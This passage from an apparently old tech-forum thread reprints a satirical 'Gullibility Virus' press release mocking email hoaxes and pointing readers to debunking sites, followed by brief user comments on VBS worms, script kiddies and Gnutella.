    WASHINGTON, D.C.--The Institute for the Investigation of Irregular Internet Phenomena announced today that many Internet users are becoming infected by a new virus that causes them to believe without question every groundless story, legend, and dire warning that shows up in their inbox or on their browser. The Gullibility Virus, as it is called, apparently makes people believe and forward copies of silly hoaxes relating to cookie recipes, email viruses, taxes on modems, and get-rich-quick schemes.

    "These are not just readers of tabloids or people who buy lottery tickets based on fortune cookie numbers," a spokesman said. "Most are otherwise normal people, who would laugh at the same stories if told to them by a stranger on a street corner." However, once these same people become infected with the Gullibility Virus, they believe anything they read on the Internet. "My immunity to tall tales and bizarre claims is all gone," reported one weeping victim. "I believe every warning message and sick child story my friends forward to me, even though most of the messages are anonymous."

    Another victim, now in remission, added, "When I first heard about Good Times, I just accepted it without question. After all, there were dozens of other recipients on the mail header, so I thought the virus must be true." It was a long time, the victim said, before she could stand up at a Hoaxees Anonymous meeting and state, "My name is Jane, and I've been hoaxed." Now, however, she is spreading the word. "Challenge and check whatever you read," she says. Internet users are urged to examine themselves for symptoms of the virus, which include the following: The willingness to believe improbable stories without thinking. The urge to forward multiple copies of such stories to others. A lack of desire to take three minutes to check to see if a story is true.

    T. C. is an example of someone recently infected. He told one reporter, "I read on the Net that the major ingredient in almost all shampoos makes your hair fall out, so I've stopped using shampoo." When told about the Gullibility Virus, T. C. said he would stop reading email, so that he would not become infected. Anyone with symptoms like these is urged to seek help immediately.

    Experts recommend that at the first feelings of gullibility, Internet users rush to their favorite search engine and look up the item tempting them to thoughtless credence. Most hoaxes, legends, and tall tales have been widely discussed and exposed by the Internet community. Courses in critical thinking are also widely available, and there is online help from many sources, including

    Department of Energy Computer Incident Advisory Capability at http://ciac.llnl.gov/ciac/CIACHoaxes.html

    Symantec Anti Virus Research Center at
    http://www.symantec.com/avcenter/index.html

    McAfee Associates Virus Hoax List at
    http://www.mcafee.com/support/hoax.html

    Dr. Solomons Hoax Page at
    http://www.drsolomons.com/vircen/hoax.html

    The Urban Legends Web Site at
    http://www.urbanlegends.com

    Urban Legends Reference Pages at
    http://www.snopes.com

    Datafellows Hoax Warnings at
    http://www.Europe.Datafellows.com/news/hoax.htm

    Those people who are still symptom free can help inoculate themselves against the Gullibility Virus by reading some good material on evaluating sources, such as

    Evaluating Internet Research Sources at
    http://www.sccu.edu/faculty/R_Harris/evalu8it.htm

    Evaluation of Information Sources at
    http://www.vuw.ac.nz/~agsmith/evaln/evaln.htm

    Bibliography on Evaluating Internet Resources at
    http://refserver.lib.vt.edu/libinst/critTHINK.HTM

    Lastly, as a public service, Internet users can help stamp out the Gullibility Virus by sending copies of this message to anyone who forwards them a hoax. This message is so important, you should be sending it anonymously! Forward it to all your friends right away! Don't think about it! This is not a chain letter! This story is true! Don't check it out! This story is so timely, there is no date on it! This story is so important, we're using lots of exclamation points! Lots!! For every message you forward to some unsuspecting person, the Home for the Hopelessly Gullible will donate ten cents to itself. (If you wonder how we will know you are forwarding these messages all over creation, you're obviously thinking too much.)

    --

    -- What you do today will cost you a day of your life.
  183. Re:Conspiracy? No, just easier by Rilke · · Score: 2

    Part of the kick of virus writers seems to be the enjoyment of watching your own code destroy people's machines. And that's just gotten tremendously simple since MS has opened up half the world's computers.

    Think back to Robert Morris. Now that was a hack, and took significant skill. Nowadays, every two-bit script kiddie can tear mail servers up after half a day of perusing a book on VBS.

    Propagation is simple these days because everybody's got e-mail and the apps and OS they're using are tremendously easy to infect.

  184. Yeah, that one trashed my drive pretty badly... by devphil · · Score: 2

    ...and I understand that it was cross-platform, too. Spread to MacOS and Novell Netware within a few hours.

    Nasty.

    --
    You cannot apply a technological solution to a sociological problem. (Edwards' Law)
  185. VBS Strikes Again! by rifter · · Score: 1

    Once again we see why scripting languages need to be secured, indeed all web technologies. But why was Gnutella scriptable with VBS?

  186. Linux GNUtella implementations exist by Stonehead · · Score: 1

    Do a search on "GNUtella" on freshmeat and you'll find several projects. By the way, acceptance of a protocol lies by no means in its simplicity, but in its functionality, quality, security and speed.

  187. Sounds like a good idea by Buttercup · · Score: 2

    Anything that spreads Vacation Bible School files is a good thing, in my book.

    MJP

    --
    Don't try that "protecting the children" shit you people use to keep the tits and bad words off my TV. --Seanbaby